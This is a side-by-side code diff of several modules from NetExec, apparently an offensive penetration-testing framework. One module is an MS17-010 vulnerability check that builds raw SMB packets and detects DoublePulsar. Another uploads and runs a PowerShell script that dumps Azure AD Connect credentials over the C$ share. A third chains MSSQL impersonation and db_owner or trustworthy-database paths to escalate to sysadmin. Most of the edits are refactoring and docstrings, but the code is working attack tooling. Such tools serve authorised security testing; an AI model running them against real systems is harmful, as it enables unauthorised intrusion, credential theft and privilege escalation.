||||||
"\xa6\xd9\xa4\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x0c\x00",
|
|
||||||
"\x42\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x4e\x00",
|
|
||||||
"\x01",
|
|
||||||
"\x00",
|
|
||||||
"\x0e\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x0c\x00" + "\x00" * 12,
|
|
||||||
]
|
|
||||||
|
|
||||||
return generate_smb_proto_payload(netbios, smb_header, trans2_request)
|
# Set the values for the SMB header
|
||||||
|
smb_header = [
|
||||||
|
b"\xFF\x53\x4D\x42", # Server Component: .SMB
|
||||||
|
b"\x25", # SMB Command: Trans2
|
||||||
|
b"\x00\x00\x00\x00", # NT Status
|
||||||
|
b"\x18", # flags
|
||||||
|
b"\x01\x28", # flags2
|
||||||
|
b"\x00\x00", # pid high
|
||||||
|
b"\x00\x00\x00\x00\x00\x00\x00\x00", # sig
|
||||||
|
b"\x00\x00", # Reserved
|
||||||
|
treeid, # Tree ID
|
||||||
|
processid, # Process ID
|
||||||
|
userid, # User ID
|
||||||
|
multiplex_id, # Multiplex ID
|
||||||
|
]
|
||||||
|
|
||||||
|
# Set the values for the transaction request
|
||||||
|
tran_request = [
|
||||||
|
b"\x10", # Word Count
|
||||||
|
b"\x00\x00", # Total Parameter Count
|
||||||
|
b"\x00\x00", # Total Data Count
|
||||||
|
b"\xff\xff", # Max Parameter Count
|
||||||
|
b"\xff\xff", # Max Data Count
|
||||||
|
b"\x00", # Max Setup Count
|
||||||
|
b"\x00", # Reserved
|
||||||
|
b"\x00\x00", # Flags
|
||||||
|
b"\x00\x00\x00\x00", # Timeout
|
||||||
|
b"\x00\x00", # Reserved
|
||||||
|
b"\x00\x00", # Parameter Count
|
||||||
|
b"\x4a\x00", # Parameter Offset
|
||||||
|
b"\x00\x00", # Data Count
|
||||||
|
b"\x4a\x00", # Data Offset
|
||||||
|
b"\x02", # Setup Count
|
||||||
|
b"\x00", # Reserved
|
||||||
|
b"\x23\x00", # SMB Pipe Protocol: Function: PeekNamedPipe (0x0023)
|
||||||
|
b"\x00\x00", # SMB Pipe Protocol: FID
|
||||||
|
b"\x07\x00",
|
||||||
|
b"\x5c\x50\x49\x50\x45\x5c\x00", # \PIPE\
|
||||||
|
]
|
||||||
|
|
||||||
|
return self.generate_smb_proto_payload(netbios, smb_header, tran_request)
|
||||||
|
|
||||||
|
|
||||||
def check(ip, port=445):
|
def trans2_request(self, treeid, processid, userid, multiplex_id):
|
||||||
"""Check if MS17_010 SMB Vulnerability exists."""
|
"""Generate trans2 request.
|
||||||
try:
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
treeid: The treeid parameter.
|
||||||
|
processid: The processid parameter.
|
||||||
|
userid: The userid parameter.
|
||||||
|
multiplex_id: The multiplex_id parameter.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
The generated SMB protocol payload.
|
||||||
|
"""
|
||||||
|
self.logger.debug("generate trans2 request")
|
||||||
|
|
||||||
|
# Define the netbios section of the SMB request
|
||||||
|
netbios = [
|
||||||
|
b"\x00",
|
||||||
|
b"\x00\x00\x4f"
|
||||||
|
]
|
||||||
|
|
||||||
|
# Define the SMB header section of the SMB request
|
||||||
|
smb_header = [
|
||||||
|
b"\xFF\x53\x4D\x42", # 'server_component': .SMB
|
||||||
|
b"\x32", # 'smb_command': Trans2
|
||||||
|
b"\x00\x00\x00\x00",
|
||||||
|
b"\x18",
|
||||||
|
b"\x07\xc0",
|
||||||
|
b"\x00\x00",
|
||||||
|
b"\x00\x00\x00\x00\x00\x00\x00\x00",
|
||||||
|
b"\x00\x00",
|
||||||
|
treeid,
|
||||||
|
processid,
|
||||||
|
userid,
|
||||||
|
multiplex_id,
|
||||||
|
]
|
||||||
|
|
||||||
|
# Define the trans2 request section of the SMB request
|
||||||
|
trans2_request = [
|
||||||
|
b"\x0f",
|
||||||
|
b"\x0c\x00",
|
||||||
|
b"\x00\x00",
|
||||||
|
b"\x01\x00",
|
||||||
|
b"\x00\x00",
|
||||||
|
b"\x00",
|
||||||
|
b"\x00",
|
||||||
|
b"\x00\x00",
|
||||||
|
b"\xa6\xd9\xa4\x00", # Timeout: 3 hours, 3.622 seconds
|
||||||
|
b"\x00\x00",
|
||||||
|
b"\x0c\x00",
|
||||||
|
b"\x42\x00",
|
||||||
|
b"\x00\x00",
|
||||||
|
b"\x4e\x00",
|
||||||
|
b"\x01",
|
||||||
|
b"\x00",
|
||||||
|
b"\x0e\x00", # subcommand: SESSION_SETUP
|
||||||
|
b"\x00\x00",
|
||||||
|
b"\x0c\x00" + b"\x00" * 12,
|
||||||
|
]
|
||||||
|
|
||||||
|
return self.generate_smb_proto_payload(netbios, smb_header, trans2_request)
|
||||||
|
|
||||||
|
|
||||||
|
def check(self, ip, port=445):
|
||||||
|
"""Check if MS17_010 SMB Vulnerability exists.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
ip (str): The IP address of the target machine.
|
||||||
|
port (int, optional): The port number to connect to. Defaults to 445.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
bool: True if the vulnerability exists, False otherwise.
|
||||||
|
"""
|
||||||
buffersize = 1024
|
buffersize = 1024
|
||||||
timeout = 5.0
|
timeout = 5.0
|
||||||
|
|
||||||
|
# Send smb request based on socket.
|
||||||
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
client.settimeout(timeout)
|
client.settimeout(timeout)
|
||||||
client.connect((ip, port))
|
client.connect((ip, port))
|
||||||
|
|
||||||
raw_proto = negotiate_proto_request()
|
# SMB - Negotiate Protocol Request
|
||||||
|
raw_proto = self.negotiate_proto_request()
|
||||||
client.send(raw_proto)
|
client.send(raw_proto)
|
||||||
tcp_response = client.recv(buffersize)
|
tcp_response = client.recv(buffersize)
|
||||||
|
|
||||||
raw_proto = session_setup_andx_request()
|
# SMB - Session Setup AndX Request
|
||||||
|
raw_proto = self.session_setup_andx_request()
|
||||||
client.send(raw_proto)
|
client.send(raw_proto)
|
||||||
tcp_response = client.recv(buffersize)
|
tcp_response = client.recv(buffersize)
|
||||||
netbios = tcp_response[:4]
|
|
||||||
smb_header = tcp_response[4:36]
|
tcp_response[:4]
|
||||||
smb = SMB_HEADER(smb_header)
|
smb_header = tcp_response[4:36] # SMB Header: 32 bytes
|
||||||
|
smb = SmbHeader(smb_header)
|
||||||
|
|
||||||
user_id = struct.pack("<H", smb.user_id)
|
user_id = struct.pack("<H", smb.user_id)
|
||||||
|
|
||||||
|
# parse native_os from Session Setup Andx Response
|
||||||
session_setup_andx_response = tcp_response[36:]
|
session_setup_andx_response = tcp_response[36:]
|
||||||
native_os = session_setup_andx_response[9:].split("\x00")[0]
|
native_os = session_setup_andx_response[9:].split(b"\x00")[0]
|
||||||
|
|
||||||
raw_proto = tree_connect_andx_request(ip, user_id)
|
# SMB - Tree Connect AndX Request
|
||||||
|
raw_proto = self.tree_connect_andx_request(ip, user_id)
|
||||||
client.send(raw_proto)
|
client.send(raw_proto)
|
||||||
tcp_response = client.recv(buffersize)
|
tcp_response = client.recv(buffersize)
|
||||||
|
|
||||||
netbios = tcp_response[:4]
|
tcp_response[:4]
|
||||||
smb_header = tcp_response[4:36]
|
smb_header = tcp_response[4:36] # SMB Header: 32 bytes
|
||||||
smb = SMB_HEADER(smb_header)
|
smb = SmbHeader(smb_header)
|
||||||
|
|
||||||
tree_id = struct.pack("<H", smb.tree_id)
|
tree_id = struct.pack("<H", smb.tree_id)
|
||||||
process_id = struct.pack("<H", smb.process_id)
|
process_id = struct.pack("<H", smb.process_id)
|
||||||
user_id = struct.pack("<H", smb.user_id)
|
user_id = struct.pack("<H", smb.user_id)
|
||||||
multiplex_id = struct.pack("<H", smb.multiplex_id)
|
multiplex_id = struct.pack("<H", smb.multiplex_id)
|
||||||
|
|
||||||
raw_proto = peeknamedpipe_request(tree_id, process_id, user_id, multiplex_id)
|
# SMB - PeekNamedPipe Request
|
||||||
|
raw_proto = self.peeknamedpipe_request(tree_id, process_id, user_id, multiplex_id)
|
||||||
client.send(raw_proto)
|
client.send(raw_proto)
|
||||||
tcp_response = client.recv(buffersize)
|
tcp_response = client.recv(buffersize)
|
||||||
|
|
||||||
netbios = tcp_response[:4]
|
tcp_response[:4]
|
||||||
smb_header = tcp_response[4:36]
|
smb_header = tcp_response[4:36]
|
||||||
smb = SMB_HEADER(smb_header)
|
smb = SmbHeader(smb_header)
|
||||||
|
|
||||||
nt_status = struct.pack("BBH", smb.error_class, smb.reserved1, smb.error_code)
|
nt_status = struct.pack("BBH", smb.error_class, smb.reserved1, smb.error_code)
|
||||||
|
self.logger.debug(f"NT Status: {nt_status}")
|
||||||
|
|
||||||
if nt_status == "\x05\x02\x00\xc0":
|
# 0xC0000205 - STATUS_INSUFF_SERVER_RESOURCES - vulnerable
|
||||||
return True
|
# 0xC0000008 - STATUS_INVALID_HANDLE
|
||||||
elif nt_status in ("\x08\x00\x00\xc0", "\x22\x00\x00\xc0"):
|
# 0xC0000022 - STATUS_ACCESS_DENIED
|
||||||
return False
|
|
||||||
|
if nt_status == b"\x05\x02\x00\xc0":
|
||||||
|
self.logger.highlight(f"[+] {ip} is likely VULNERABLE to MS17-010! ({native_os.decode()})")
|
||||||
|
|
||||||
|
# vulnerable to MS17-010, check for DoublePulsar infection
|
||||||
|
raw_proto = self.trans2_request(tree_id, process_id, user_id, multiplex_id)
|
||||||
|
client.send(raw_proto)
|
||||||
|
tcp_response = client.recv(buffersize)
|
||||||
|
|
||||||
|
tcp_response[:4]
|
||||||
|
smb_header = tcp_response[4:36]
|
||||||
|
smb = SmbHeader(smb_header)
|
||||||
|
|
||||||
|
if smb.multiplex_id == 0x0051:
|
||||||
|
key = self.calculate_doublepulsar_xor_key(smb.signature)
|
||||||
|
self.logger.highlight(f"Host is likely INFECTED with DoublePulsar! - XOR Key: {key.decode()}")
|
||||||
|
elif nt_status in (b"\x08\x00\x00\xc0", b"\x22\x00\x00\xc0"):
|
||||||
|
self.logger.fail(f"{ip} does NOT appear vulnerable")
|
||||||
else:
|
else:
|
||||||
return False
|
self.logger.fail(f"{ip} Unable to detect if this host is vulnerable")
|
||||||
|
|
||||||
except Exception as err:
|
|
||||||
return False
|
|
||||||
finally:
|
|
||||||
client.close()
|
client.close()
|
||||||
|
|
|
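Editor's note summarising the detection logic in the rewritten check() above: after the PeekNamedPipe transaction, the NT status packed from the SMB header decides the verdict, and a follow-up Trans2 SESSION_SETUP answered with multiplex ID 0x51 indicates a DoublePulsar implant, whose XOR key is derived from the signature field. A condensed, hedged sketch of just that decision logic; the status constants and XOR arithmetic are taken from the diff, everything else (function names, sample values) is illustrative.

STATUS_INSUFF_SERVER_RESOURCES = b"\x05\x02\x00\xc0"  # vulnerable
STATUS_INVALID_HANDLE = b"\x08\x00\x00\xc0"
STATUS_ACCESS_DENIED = b"\x22\x00\x00\xc0"

def doublepulsar_xor_key(s: int) -> int:
    # Same arithmetic as calculate_doublepulsar_xor_key, truncated to 32 bits.
    x = 2 * s ^ (((s & 0xFF00 | (s << 16)) << 8) | (((s >> 16) | s & 0xFF0000) >> 8))
    return x & 0xFFFFFFFF

def interpret(nt_status: bytes, multiplex_id: int, signature: int) -> str:
    if nt_status == STATUS_INSUFF_SERVER_RESOURCES:
        if multiplex_id == 0x0051:
            return f"vulnerable + DoublePulsar (XOR key {doublepulsar_xor_key(signature):08x})"
        return "vulnerable to MS17-010"
    if nt_status in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return "not vulnerable"
    return "undetermined"

print(interpret(STATUS_INSUFF_SERVER_RESOURCES, 0x0051, 0x1122334455667788))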
@ -3,6 +3,7 @@
|
||||||
# Based on the article : https://blog.xpnsec.com/azuread-connect-for-redteam/
|
# Based on the article : https://blog.xpnsec.com/azuread-connect-for-redteam/
|
||||||
from sys import exit
|
from sys import exit
|
||||||
from os import path
|
from os import path
|
||||||
|
import sys
|
||||||
from nxc.helpers.powershell import get_ps_script
|
from nxc.helpers.powershell import get_ps_script
|
||||||
|
|
||||||
|
|
||||||
|
@ -27,9 +28,7 @@ class NXCModule:
|
||||||
self.module_options = module_options
|
self.module_options = module_options
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""MSOL_PS1 // Path to the msol binary on your computer"""
|
||||||
MSOL_PS1 // Path to the msol binary on your computer
|
|
||||||
"""
|
|
||||||
self.tmp_dir = "C:\\Windows\\Temp\\"
|
self.tmp_dir = "C:\\Windows\\Temp\\"
|
||||||
self.share = "C$"
|
self.share = "C$"
|
||||||
self.tmp_share = self.tmp_dir.split(":")[1]
|
self.tmp_share = self.tmp_dir.split(":")[1]
|
||||||
|
@ -37,7 +36,7 @@ class NXCModule:
|
||||||
self.use_embedded = True
|
self.use_embedded = True
|
||||||
self.msolmdl = self.cmd = ""
|
self.msolmdl = self.cmd = ""
|
||||||
|
|
||||||
with open(get_ps_script("msol_dump/msol_dump.ps1"), "r") as msolsc:
|
with open(get_ps_script("msol_dump/msol_dump.ps1")) as msolsc:
|
||||||
self.msol_embedded = msolsc.read()
|
self.msol_embedded = msolsc.read()
|
||||||
|
|
||||||
if "MSOL_PS1" in module_options:
|
if "MSOL_PS1" in module_options:
|
||||||
|
@ -51,8 +50,14 @@ class NXCModule:
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
if self.use_embedded:
|
if self.use_embedded:
|
||||||
file_to_upload = "/tmp/msol.ps1"
|
file_to_upload = "/tmp/msol.ps1"
|
||||||
with open(file_to_upload, "w") as msol:
|
|
||||||
msol.write(self.msol_embedded)
|
try:
|
||||||
|
with open(file_to_upload, "w") as msol:
|
||||||
|
msol.write(self.msol_embedded)
|
||||||
|
except FileNotFoundError:
|
||||||
|
context.log.fail(f"Impersonate file specified '{file_to_upload}' does not exist!")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
else:
|
else:
|
||||||
if path.isfile(self.MSOL_PS1):
|
if path.isfile(self.MSOL_PS1):
|
||||||
file_to_upload = self.MSOL_PS1
|
file_to_upload = self.MSOL_PS1
|
||||||
|
@ -64,25 +69,25 @@ class NXCModule:
|
||||||
with open(file_to_upload, "rb") as msol:
|
with open(file_to_upload, "rb") as msol:
|
||||||
try:
|
try:
|
||||||
connection.conn.putFile(self.share, f"{self.tmp_share}{self.msol}", msol.read)
|
connection.conn.putFile(self.share, f"{self.tmp_share}{self.msol}", msol.read)
|
||||||
context.log.success(f"Msol script successfully uploaded")
|
context.log.success("Msol script successfully uploaded")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail(f"Error writing file to share {self.tmp_share}: {e}")
|
context.log.fail(f"Error writing file to share {self.tmp_share}: {e}")
|
||||||
return
|
return
|
||||||
try:
|
try:
|
||||||
if self.cmd == "":
|
if self.cmd == "":
|
||||||
context.log.display(f"Executing the script")
|
context.log.display("Executing the script")
|
||||||
p = self.exec_script(context, connection)
|
p = self.exec_script(context, connection)
|
||||||
for line in p.splitlines():
|
for line in p.splitlines():
|
||||||
p1, p2 = line.split(" ", 1)
|
p1, p2 = line.split(" ", 1)
|
||||||
context.log.highlight(f"{p1} {p2}")
|
context.log.highlight(f"{p1} {p2}")
|
||||||
else:
|
else:
|
||||||
context.log.fail(f"Script Execution Impossible")
|
context.log.fail("Script Execution Impossible")
|
||||||
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail(f"Error running command: {e}")
|
context.log.fail(f"Error running command: {e}")
|
||||||
finally:
|
finally:
|
||||||
try:
|
try:
|
||||||
connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.msol}")
|
connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.msol}")
|
||||||
context.log.success(f"Msol script successfully deleted")
|
context.log.success("Msol script successfully deleted")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail(f"[OPSEC] Error deleting msol script on {self.share}: {e}")
|
context.log.fail(f"[OPSEC] Error deleting msol script on {self.share}: {e}")
|
||||||
|
|
|
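Editor's note on the msol_dump hunks above: the script write is now wrapped in try/except and the remote cleanup stays in a finally block, so the uploaded file is removed even when execution fails. A compact, hedged sketch of that upload-then-always-delete pattern; FakeSMBConnection and upload_run_cleanup are invented stand-ins so the flow can run without a target, only the putFile/deleteFile call shape mirrors the diff.

import io

class FakeSMBConnection:
    """Stand-in for connection.conn so the flow is runnable without a host."""
    def putFile(self, share, path, callback):
        print(f"putFile -> {share}{path} ({len(callback(4096))} bytes)")
    def deleteFile(self, share, path):
        print(f"deleteFile -> {share}{path}")

def upload_run_cleanup(conn, share="C$", tmp_share="\\Windows\\Temp\\", name="msol.ps1"):
    payload = io.BytesIO(b"Write-Output 'demo'")
    try:
        conn.putFile(share, f"{tmp_share}{name}", payload.read)
        # ... execute the uploaded script here ...
    finally:
        # Cleanup always runs, mirroring the module's finally block.
        conn.deleteFile(share, f"{tmp_share}{name}")

upload_run_cleanup(FakeSMBConnection())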
@ -1,9 +1,5 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
# Author:
|
# Author:
|
||||||
# Romain de Reydellet (@pentest_soka)
|
# Romain de Reydellet (@pentest_soka)
|
||||||
|
|
||||||
|
|
||||||
from nxc.helpers.logger import highlight
|
from nxc.helpers.logger import highlight
|
||||||
|
|
||||||
|
|
||||||
|
@ -22,9 +18,7 @@ class User:
|
||||||
|
|
||||||
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
"""
|
"""Enumerate MSSQL privileges and exploit them"""
|
||||||
Enumerate MSSQL privileges and exploit them
|
|
||||||
"""
|
|
||||||
|
|
||||||
name = "mssql_priv"
|
name = "mssql_priv"
|
||||||
description = "Enumerate and exploit MSSQL privileges"
|
description = "Enumerate and exploit MSSQL privileges"
|
||||||
|
@ -92,9 +86,20 @@ class NXCModule:
|
||||||
elif target_user.dbowner:
|
elif target_user.dbowner:
|
||||||
self.do_dbowner_privesc(target_user.dbowner, exec_as)
|
self.do_dbowner_privesc(target_user.dbowner, exec_as)
|
||||||
if self.is_admin_user(self.current_username):
|
if self.is_admin_user(self.current_username):
|
||||||
self.context.log.success(f"{self.current_username} is now a sysadmin! " + highlight("({})".format(self.context.conf.get("nxc", "pwn3d_label"))))
|
self.context.log.success(f"{self.current_username} is now a sysadmin! " + highlight(f"({self.context.conf.get('nxc', 'pwn3d_label')})"))
|
||||||
|
|
||||||
def build_exec_as_from_path(self, target_user):
|
def build_exec_as_from_path(self, target_user):
|
||||||
|
"""
|
||||||
|
Builds an 'exec_as' path based on the given target user.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
target_user (User): The target user for building the 'exec_as' path.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
str: The 'exec_as' path built from the target user's username and its parent usernames.
|
||||||
|
"""
|
||||||
path = [target_user.username]
|
path = [target_user.username]
|
||||||
parent = target_user.parent
|
parent = target_user.parent
|
||||||
while parent:
|
while parent:
|
||||||
|
@ -105,6 +110,19 @@ class NXCModule:
|
||||||
return self.sql_exec_as(reversed(path))
|
return self.sql_exec_as(reversed(path))
|
||||||
|
|
||||||
def browse_path(self, context, initial_user: User, user: User) -> User:
|
def browse_path(self, context, initial_user: User, user: User) -> User:
|
||||||
|
"""
|
||||||
|
Browse the path of user impersonation.
|
||||||
|
|
||||||
|
Parameters
|
||||||
|
----------
|
||||||
|
context (Context): The context of the function.
|
||||||
|
initial_user (User): The initial user.
|
||||||
|
user (User): The user to browse the path for.
|
||||||
|
|
||||||
|
Returns
|
||||||
|
-------
|
||||||
|
User: The user that can be impersonated.
|
||||||
|
"""
|
||||||
if initial_user.is_sysadmin:
|
if initial_user.is_sysadmin:
|
||||||
self.context.log.success(f"{initial_user.username} is sysadmin")
|
self.context.log.success(f"{initial_user.username} is sysadmin")
|
||||||
return initial_user
|
return initial_user
|
||||||
|
@ -113,7 +131,7 @@ class NXCModule:
|
||||||
return initial_user
|
return initial_user
|
||||||
for grantor in user.grantors:
|
for grantor in user.grantors:
|
||||||
if grantor.is_sysadmin:
|
if grantor.is_sysadmin:
|
||||||
self.context.log.success(f"{user.username} can impersonate: " f"{grantor.username} (sysadmin)")
|
self.context.log.success(f"{user.username} can impersonate: {grantor.username} (sysadmin)")
|
||||||
return grantor
|
return grantor
|
||||||
elif grantor.dbowner:
|
elif grantor.dbowner:
|
||||||
self.context.log.success(f"{user.username} can impersonate: {grantor.username} (which can privesc via dbowner)")
|
self.context.log.success(f"{user.username} can impersonate: {grantor.username} (which can privesc via dbowner)")
|
||||||
|
@ -123,23 +141,50 @@ class NXCModule:
|
||||||
return self.browse_path(context, initial_user, grantor)
|
return self.browse_path(context, initial_user, grantor)
|
||||||
|
|
||||||
def query_and_get_output(self, query):
|
def query_and_get_output(self, query):
|
||||||
# try:
|
return self.mssql_conn.sql_query(query)
|
||||||
results = self.mssql_conn.sql_query(query)
|
|
||||||
# self.mssql_conn.printRows()
|
|
||||||
# query_output = self.mssql_conn._MSSQL__rowsPrinter.getMessage()
|
|
||||||
# query_output = results.strip("\n-")
|
|
||||||
return results
|
|
||||||
# except Exception as e:
|
|
||||||
# return False
|
|
||||||
|
|
||||||
def sql_exec_as(self, grantors: list) -> str:
|
def sql_exec_as(self, grantors: list) -> str:
|
||||||
exec_as = []
|
"""
|
||||||
for grantor in grantors:
|
Generates an SQL statement to execute a command using the specified list of grantors.
|
||||||
exec_as.append(f"EXECUTE AS LOGIN = '{grantor}';")
|
|
||||||
|
Parameters
|
||||||
|
----------
|
||||||
|
grantors (list): A list of grantors, each representing a login.
|
||||||
|
|
||||||
|
Returns
|
||||||
|
-------
|
||||||
|
str: The SQL statement to execute the command using the grantors.
|
||||||
|
"""
|
||||||
|
exec_as = [f"EXECUTE AS LOGIN = '{grantor}';" for grantor in grantors]
|
||||||
return "".join(exec_as)
|
return "".join(exec_as)
|
||||||
|
|
||||||
def perform_impersonation_check(self, user: User, grantors=[]):
|
def perform_impersonation_check(self, user: User, grantors=None):
|
||||||
|
"""
|
||||||
|
Performs an impersonation check for a given user.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
user (User): The user for whom the impersonation check is being performed.
|
||||||
|
grantors (list, optional): A list of grantors. Defaults to None, which is treated as an empty list.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
None
|
||||||
|
|
||||||
|
Description:
|
||||||
|
This function checks if the user has the necessary privileges to perform impersonation.
|
||||||
|
If the user has the necessary privileges, the function returns without performing any further checks.
|
||||||
|
If the user does not have the necessary privileges, the function retrieves a list of grantors
|
||||||
|
who can impersonate the user and performs the same impersonation check on each grantor recursively.
|
||||||
|
If a new grantor is found, it is added to the list of grantors and the impersonation check is performed on it.
|
||||||
|
|
||||||
|
Example Usage:
|
||||||
|
perform_impersonation_check(user, grantors=['admin', 'manager'])
|
||||||
|
|
||||||
|
"""
|
||||||
# build EXECUTE AS if any grantors is specified
|
# build EXECUTE AS if any grantors is specified
|
||||||
|
if grantors is None:
|
||||||
|
grantors = []
|
||||||
exec_as = self.sql_exec_as(grantors)
|
exec_as = self.sql_exec_as(grantors)
|
||||||
# do we have any privilege ?
|
# do we have any privilege ?
|
||||||
if self.update_priv(user, exec_as):
|
if self.update_priv(user, exec_as):
|
||||||
|
@ -160,6 +205,18 @@ class NXCModule:
|
||||||
self.perform_impersonation_check(new_user, grantors)
|
self.perform_impersonation_check(new_user, grantors)
|
||||||
|
|
||||||
def update_priv(self, user: User, exec_as=""):
|
def update_priv(self, user: User, exec_as=""):
|
||||||
|
"""
|
||||||
|
Update the privileges of a user.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
user (User): The user whose privileges need to be updated.
|
||||||
|
exec_as (str): The username of the user executing the function.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
bool: True if the user is an admin user and their privileges are updated successfully, False otherwise.
|
||||||
|
"""
|
||||||
if self.is_admin_user(user.username):
|
if self.is_admin_user(user.username):
|
||||||
user.is_sysadmin = True
|
user.is_sysadmin = True
|
||||||
return True
|
return True
|
||||||
|
@ -167,96 +224,176 @@ class NXCModule:
|
||||||
return user.dbowner
|
return user.dbowner
|
||||||
|
|
||||||
def get_current_username(self) -> str:
|
def get_current_username(self) -> str:
|
||||||
|
"""
|
||||||
|
Retrieves the current username.
|
||||||
|
|
||||||
|
:param self: The instance of the class.
|
||||||
|
:return: The current username as a string.
|
||||||
|
:rtype: str
|
||||||
|
"""
|
||||||
return self.query_and_get_output("select SUSER_NAME()")[0][""]
|
return self.query_and_get_output("select SUSER_NAME()")[0][""]
|
||||||
|
|
||||||
def is_admin(self, exec_as="") -> bool:
|
def is_admin(self, exec_as="") -> bool:
|
||||||
|
"""
|
||||||
|
Checks if the user is an admin.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
exec_as (str): The user to execute the query as. Default is an empty string.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
bool: True if the user is an admin, False otherwise.
|
||||||
|
"""
|
||||||
res = self.query_and_get_output(exec_as + "SELECT IS_SRVROLEMEMBER('sysadmin')")
|
res = self.query_and_get_output(exec_as + "SELECT IS_SRVROLEMEMBER('sysadmin')")
|
||||||
self.revert_context(exec_as)
|
self.revert_context(exec_as)
|
||||||
is_admin = res[0][""]
|
is_admin = res[0][""]
|
||||||
self.context.log.debug(f"IsAdmin Result: {is_admin}")
|
self.context.log.debug(f"IsAdmin Result: {is_admin}")
|
||||||
if is_admin:
|
if is_admin:
|
||||||
self.context.log.debug(f"User is admin!")
|
self.context.log.debug("User is admin!")
|
||||||
self.admin_privs = True
|
self.admin_privs = True
|
||||||
return True
|
return True
|
||||||
else:
|
else:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
def get_databases(self, exec_as="") -> list:
|
def get_databases(self, exec_as="") -> list:
|
||||||
|
"""
|
||||||
|
Retrieves a list of databases from the SQL server.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
exec_as (str, optional): The username to execute the query as. Defaults to "".
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
list: A list of database names.
|
||||||
|
"""
|
||||||
res = self.query_and_get_output(exec_as + "SELECT name FROM master..sysdatabases")
|
res = self.query_and_get_output(exec_as + "SELECT name FROM master..sysdatabases")
|
||||||
self.revert_context(exec_as)
|
self.revert_context(exec_as)
|
||||||
self.context.log.debug(f"Response: {res}")
|
self.context.log.debug(f"Response: {res}")
|
||||||
self.context.log.debug(f"Response Type: {type(res)}")
|
self.context.log.debug(f"Response Type: {type(res)}")
|
||||||
tables = [table["name"] for table in res]
|
return [table["name"] for table in res]
|
||||||
return tables
|
|
||||||
|
|
||||||
def is_dbowner(self, database, exec_as="") -> bool:
|
def is_db_owner(self, database, exec_as="") -> bool:
|
||||||
query = f"""select rp.name as database_role
|
"""
|
||||||
from [{database}].sys.database_role_members drm
|
Check if the specified database is owned by the current user.
|
||||||
join [{database}].sys.database_principals rp
|
|
||||||
on (drm.role_principal_id = rp.principal_id)
|
Args:
|
||||||
join [{database}].sys.database_principals mp
|
----
|
||||||
on (drm.member_principal_id = mp.principal_id)
|
database (str): The name of the database to check.
|
||||||
where rp.name = 'db_owner' and mp.name = SYSTEM_USER"""
|
exec_as (str, optional): The name of the user to execute the query as. Defaults to "".
|
||||||
self.context.log.debug(f"Query: {query}")
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
bool: True if the database is owned by the current user, False otherwise.
|
||||||
|
"""
|
||||||
|
query = f"""
|
||||||
|
SELECT rp.name AS database_role
|
||||||
|
FROM [{database}].sys.database_role_members drm
|
||||||
|
JOIN [{database}].sys.database_principals rp ON (drm.role_principal_id = rp.principal_id)
|
||||||
|
JOIN [{database}].sys.database_principals mp ON (drm.member_principal_id = mp.principal_id)
|
||||||
|
WHERE rp.name = 'db_owner' AND mp.name = SYSTEM_USER
|
||||||
|
"""
|
||||||
res = self.query_and_get_output(exec_as + query)
|
res = self.query_and_get_output(exec_as + query)
|
||||||
self.context.log.debug(f"Response: {res}")
|
if res and "database_role" in res[0] and res[0]["database_role"] == "db_owner":
|
||||||
self.revert_context(exec_as)
|
return True
|
||||||
if res:
|
|
||||||
if "database_role" in res[0] and res[0]["database_role"] == "db_owner":
|
|
||||||
return True
|
|
||||||
else:
|
|
||||||
return False
|
|
||||||
return False
|
return False
|
||||||
|
|
||||||
def find_dbowner_priv(self, databases, exec_as="") -> list:
|
def find_dbowner_priv(self, databases, exec_as="") -> list:
|
||||||
match = []
|
"""
|
||||||
for database in databases:
|
Finds the list of databases for which the specified user is the owner.
|
||||||
if self.is_dbowner(database, exec_as):
|
|
||||||
match.append(database)
|
|
||||||
return match
|
|
||||||
|
|
||||||
def find_trusted_db(self, exec_as="") -> list:
|
Args:
|
||||||
query = """SELECT d.name AS DATABASENAME
|
----
|
||||||
FROM sys.server_principals r
|
databases (list): A list of database names.
|
||||||
INNER JOIN sys.server_role_members m
|
exec_as (str, optional): The user to execute the check as. Defaults to "".
|
||||||
ON r.principal_id = m.role_principal_id
|
|
||||||
INNER JOIN sys.server_principals p ON
|
Returns:
|
||||||
p.principal_id = m.member_principal_id
|
-------
|
||||||
inner join sys.databases d
|
list: A list of database names for which the specified user is the owner.
|
||||||
on suser_sname(d.owner_sid) = p.name
|
"""
|
||||||
WHERE is_trustworthy_on = 1 AND d.name NOT IN ('MSDB')
|
